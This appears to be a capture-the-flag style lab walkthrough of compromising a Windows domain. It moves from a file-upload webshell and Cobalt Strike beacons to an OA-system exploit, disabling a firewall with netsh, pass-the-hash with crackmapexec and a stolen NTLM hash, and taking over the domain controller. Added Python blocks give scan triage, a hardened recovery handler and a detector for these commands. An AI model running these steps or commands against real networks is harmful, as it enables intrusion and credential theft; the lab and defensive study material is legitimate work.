Protected intranet domain lab: attack
forg12

Lab description

Lab topology (diagram not reproduced here)

PS: this lab was created by 暗月.

HOSTS setup

cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# 4-attack
192.168.0.204 www.moonlab.com


Web server

Information gathering

Port scan

$ sudo nmap -sT -sV -O 192.168.0.204
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for www.moonlab.com (192.168.0.204)
Host is up (0.0018s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 10.0
999/tcp open http Microsoft IIS httpd 10.0
MAC Address: 00:0C:29:36:38:42 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012 (98%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2016 (98%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.89 seconds

Directory enumeration

dirsearch -u "www.moonlab.com"

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/www.moonlab.com.txt

Error Log: /home/kali/.dirsearch/logs/errors.log

Target: http://www.moonlab.com/
403 312B http://www.moonlab.com:80/%2e%2e//google.com
200 410B http://www.moonlab.com:80/0.php
200 407B http://www.moonlab.com:80/58
200 407B http://www.moonlab.com:80/59
200 406B http://www.moonlab.com:80/6
200 410B http://www.moonlab.com:80/6.php
200 414B http://www.moonlab.com:80/ADMIN.jsp
403 312B http://www.moonlab.com:80/\..\..\..\..\..\..\..\..\..\etc\passwd
200 415B http://www.moonlab.com:80/app.config
200 424B http://www.moonlab.com:80/bitrix/import/files
200 425B http://www.moonlab.com:80/bitrix/import/import
301 155B http://www.moonlab.com:80/contents -> REDIRECTS TO: http://www.moonlab.com/contents/
301 154B http://www.moonlab.com:80/include -> REDIRECTS TO: http://www.moonlab.com/include/
200 0B http://www.moonlab.com:80/index.htm
200 266B http://www.moonlab.com:80/readme.txt
200 84B http://www.moonlab.com:80/robots.txt
301 157B http://www.moonlab.com:80/SiteServer -> REDIRECTS TO: http://www.moonlab.com/SiteServer/
301 155B http://www.moonlab.com:80/template -> REDIRECTS TO: http://www.moonlab.com/template/
200 7KB http://www.moonlab.com:80/umbraco/webservices/codeEditorSave.asmx
301 153B http://www.moonlab.com:80/upload -> REDIRECTS TO: http://www.moonlab.com/upload/
200 5B http://www.moonlab.com:80/version.txt
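As an added example (not part of the original write-up), a small Python triage script for dirsearch report lines in the format shown above. Many of the 200 results (/58, /59, /6, /0.php, /ADMIN.jsp and even /app.config) have near-identical sizes of 406 to 415 bytes, which is the usual signature of a custom "not found" page served with status 200; the script clusters such sizes as noise so that the genuinely exposed files (readme.txt, robots.txt, version.txt) stand out. The sample lines are copied from the scan output above; the list of sensitive file names and the clustering tolerance are assumptions.

```python
import re
from typing import Dict, List, Optional, Set

# Matches dirsearch report lines: "<status> <size><unit> <url> [-> REDIRECTS TO: ...]"
LINE_RE = re.compile(r"^(\d{3})\s+(\d+(?:\.\d+)?)(B|KB|MB)\s+(\S+)")
UNIT = {"B": 1, "KB": 1024, "MB": 1024 * 1024}

# Assumption: file names whose exposure on an IIS/ASP.NET site is worth reporting.
SENSITIVE = {"app.config", "web.config", "readme.txt", "version.txt", "robots.txt"}

# Lines copied from the dirsearch output above (a subset, used as sample input).
SAMPLE = """\
403 312B http://www.moonlab.com:80/%2e%2e//google.com
200 410B http://www.moonlab.com:80/0.php
200 407B http://www.moonlab.com:80/58
200 407B http://www.moonlab.com:80/59
200 406B http://www.moonlab.com:80/6
200 410B http://www.moonlab.com:80/6.php
200 414B http://www.moonlab.com:80/ADMIN.jsp
200 415B http://www.moonlab.com:80/app.config
301 155B http://www.moonlab.com:80/contents -> REDIRECTS TO: http://www.moonlab.com/contents/
200 0B http://www.moonlab.com:80/index.htm
200 266B http://www.moonlab.com:80/readme.txt
200 84B http://www.moonlab.com:80/robots.txt
200 7KB http://www.moonlab.com:80/umbraco/webservices/codeEditorSave.asmx
200 5B http://www.moonlab.com:80/version.txt
"""


def parse_line(line: str) -> Optional[Dict]:
    """Turn one report line into a record; returns None for banner/blank lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    status, num, unit, url = m.groups()
    return {
        "status": int(status),
        "size": int(float(num) * UNIT[unit]),
        "url": url,
        "name": url.rstrip("/").rsplit("/", 1)[-1].lower(),
    }


def parse_report(text: str) -> List[Dict]:
    return [e for e in (parse_line(ln) for ln in text.splitlines()) if e]


def soft404_sizes(entries: List[Dict], tol: int = 10, min_cluster: int = 3) -> Set[int]:
    """Sizes of 200 responses that cluster within `tol` bytes of each other.
    Unrelated paths all answering 200 with near-identical body sizes is the
    usual sign of a custom 'not found' page served with status 200."""
    sizes = sorted(e["size"] for e in entries if e["status"] == 200)
    best: List[int] = []
    for s in sizes:
        cluster = [x for x in sizes if abs(x - s) <= tol]
        if len(cluster) > len(best):
            best = cluster
    return set(best) if len(best) >= min_cluster else set()


def triage(text: str) -> Dict[str, List[str]]:
    """Split a report into soft-404 noise, redirects, sensitive-file findings and the rest."""
    entries = parse_report(text)
    noise = soft404_sizes(entries)
    result: Dict[str, List[str]] = {"noise": [], "redirects": [], "findings": [], "other": []}
    for e in entries:
        if e["status"] == 200 and e["size"] in noise:
            result["noise"].append(e["url"])
        elif e["status"] in (301, 302, 307, 308):
            result["redirects"].append(e["url"])
        elif e["status"] == 200 and e["name"] in SENSITIVE:
            result["findings"].append(e["url"])
        else:
            result["other"].append(e["url"])
    return result


if __name__ == "__main__":
    for bucket, urls in triage(SAMPLE).items():
        print(f"{bucket}: {len(urls)}")
        for u in urls:
            print("   ", u)
```

Run against the sample, seven of the 200 responses (including /app.config) fall into the 406 to 415 byte cluster and are reported as noise, while readme.txt, robots.txt and version.txt are reported as findings; the umbraco .asmx hit and the empty index.htm land in "other" for manual review. The size tolerance should be raised for sites whose error page embeds the requested path, since the body then grows with the path length.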

robots.txt (contents shown in a screenshot, not reproduced here)

Vulnerability testing

Password recovery

When the security-question parameter is empty, the password is displayed.
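The flaw described here is a classic missing-input check. The following is an added example, not code from the lab or from the CMS: a constructed password-recovery handler in Python showing the vulnerable pattern (the security-answer check is skipped when the field is absent or empty, so the stored password is returned) next to a hardened version that requires the answer, compares it in constant time and hands back a one-time reset token instead of the password. The user record, the field names and the hashing are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed user record for the demo. Storing a recoverable password is itself a
# defect; it is kept only to mirror the behaviour described in the write-up, where
# the flawed endpoint discloses the stored password.
USERS = {
    "alice": {
        "question": "favourite colour",
        "answer_hash": hashlib.sha256(b"blue").hexdigest(),
        "password": "S3cret-demo",
    }
}


def recover_vulnerable(form: Dict[str, str]) -> Optional[str]:
    """Flawed handler: the answer is validated only when the field is present and
    non-empty, so a request that omits or blanks it skips straight to disclosure."""
    user = USERS.get(form.get("username", ""))
    if user is None:
        return None
    answer = form.get("answer")
    if answer:  # "" and None are falsy -> the whole check is skipped
        if hashlib.sha256(answer.encode()).hexdigest() != user["answer_hash"]:
            return None
    return user["password"]


def recover_hardened(form: Dict[str, str]) -> Optional[str]:
    """Fixed handler: the answer is mandatory, compared in constant time, and success
    yields a one-time reset token rather than the password itself.
    (A real deployment would also rate-limit attempts and use a salted slow hash.)"""
    user = USERS.get(form.get("username", ""))
    answer = form.get("answer", "")
    if user is None or not answer:
        return None
    digest = hashlib.sha256(answer.encode()).hexdigest()
    if not hmac.compare_digest(digest, user["answer_hash"]):
        return None
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    blank = {"username": "alice", "answer": ""}
    print("vulnerable, blank answer ->", recover_vulnerable(blank))
    print("hardened,   blank answer ->", recover_hardened(blank))
    print("hardened,   right answer ->", recover_hardened({"username": "alice", "answer": "blue"}))
```

The fix is the `if user is None or not answer` guard, which treats an absent or empty field as a failed check rather than as "nothing to check"; returning a reset token instead of the password removes the disclosure even if a later check is bypassed.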


Backend file upload getshell

Upload a zipped Behinder aspx webshell.

http://www.moonlab.com/sitefiles/sitetemplates/c/c.aspx

Getting a CS beacon

AV_Evasion_Tool

Generate pyload.c and use 掩日 (AV_Evasion_Tool) to build a reverse-connect payload.

Privilege escalation

SpoolSystem Inject

shell va.exe

Dumping plaintext credentials

OA server

Information gathering

Port scan

Host is up (1.2s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-robots.txt: 1 disallowed entry
|_/
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4775.10 seconds

Vulnerability testing

Port 80 runs Tongda OA; a Tongda OA vulnerability scanning tool was used to get a shell.

Connect directly with AntSword:

Generate a bind (forward-connect) payload with CS. After running it, connect got no response; the process list showed the payload running normally, so there is a firewall in the way. Turn the firewall off.

NetSh Advfirewall set allprofiles state off

After turning it off, the beacon checks in successfully:

Grabbed plaintext credentials and obtained the domain controller's hash, among others.

Domain controller

Information gathering

Locate the domain controller:

shell net user /domain
shell net time /domain
shell ping dc.attack.local
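From the defender's side, both the firewall shutdown with netsh on the OA server and the net ... /domain recon commands above leave distinctive process-creation records. The following is an added example, not part of the original post: a Python detector run over constructed process-creation lines in a simplified "timestamp host user command" layout (an assumption for the example; in practice the source would be Sysmon Event ID 1 or Security Event 4688 command lines). It raises one alert for any netsh firewall-disable command and another when a single host issues two or more distinct domain recon commands within five minutes. It also covers the legacy "netsh firewall set opmode disable" form, which goes beyond the one command shown on the page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed process-creation records: "<ISO timestamp> <host> <user> <command line>".
# This simplified layout is an assumption for the example; Sysmon Event ID 1 or
# Security Event 4688 would supply the same fields in practice.
SAMPLE_LOG = """\
2024-01-13T16:18:01 OA-SRV ATTACK\\svc_oa cmd.exe /c netsh advfirewall set allprofiles state off
2024-01-13T16:18:02 OA-SRV ATTACK\\svc_oa net user /domain
2024-01-13T16:18:05 OA-SRV ATTACK\\svc_oa net time /domain
2024-01-13T16:18:09 OA-SRV ATTACK\\svc_oa ping dc.attack.local
2024-01-13T16:20:00 FILE01 ATTACK\\helpdesk net time /domain
2024-01-13T17:05:00 WS07 ATTACK\\bob notepad.exe report.txt
"""

# Current syntax (as used on the page) and the legacy 'netsh firewall' form.
FIREWALL_OFF = [
    re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
    re.compile(r"netsh\s+firewall\s+set\s+opmode\s+(?:mode=)?disable", re.I),
]
# net user/group/time ... /domain (net1.exe is the same binary under another name)
DOMAIN_RECON = re.compile(r"\bnet1?(?:\.exe)?\s+(?:user|group|time)\b.*?/domain\b", re.I)


def parse_log(text: str) -> List[Dict]:
    """Split each record into timestamp, host, user and the full command line."""
    events = []
    for line in text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue
        ts, host, user, cmd = parts
        events.append({"ts": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd})
    return events


def detect(events: List[Dict], window: timedelta = timedelta(minutes=5), min_recon: int = 2) -> List[Dict]:
    """Return alerts: one per firewall-disable command, and one per host that runs
    at least `min_recon` distinct domain recon commands inside `window`."""
    alerts: List[Dict] = []
    recon: Dict[str, List[Dict]] = defaultdict(list)
    for e in events:
        if any(p.search(e["cmd"]) for p in FIREWALL_OFF):
            alerts.append({"rule": "host_firewall_disabled", "host": e["host"],
                           "user": e["user"], "commands": [e["cmd"]]})
        elif DOMAIN_RECON.search(e["cmd"]):
            recon[e["host"]].append(e)
    for host, evs in recon.items():
        evs.sort(key=lambda x: x["ts"])
        for i, first in enumerate(evs):  # sliding window anchored at each event
            burst = [x for x in evs[i:] if x["ts"] - first["ts"] <= window]
            cmds = sorted({x["cmd"].lower() for x in burst})
            if len(cmds) >= min_recon:
                alerts.append({"rule": "domain_recon_burst", "host": host,
                               "user": first["user"], "commands": cmds})
                break
    return alerts


if __name__ == "__main__":
    for a in detect(parse_log(SAMPLE_LOG)):
        print(a["rule"], a["host"], a["user"], a["commands"])
```

On the sample, OA-SRV produces both alerts, while the single `net time /domain` from FILE01 stays below the burst threshold. The firewall rule is worth treating as high severity on its own: on a server there is almost no legitimate reason for a service account to disable every profile at once, and the same event can be corroborated by the firewall's own "setting changed" audit events.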


CS lateral movement: PsExec

When dumping passwords on the OA server we obtained the domain admin's hash, but the bind-payload check-in failed; creating a listener on the OA server and using a reverse-connect payload brought the beacon in successfully.


crackmapexec

The hash can be checked for validity with CME.

proxychains crackmapexec smb 10.10.12.165 -u administrator -H '15132c3d36a7e5d7905e02b478979046' -x whoami


Lateral movement via process injection

Inject into an ATTACK\administrator process to obtain a session with domain-admin rights.

From the injected session, choose to use the session's current access token for lateral movement.

Beacon check-in succeeds; the domain controller machine is taken.

Flag

shell type C:\Users\Administrator\flag.txt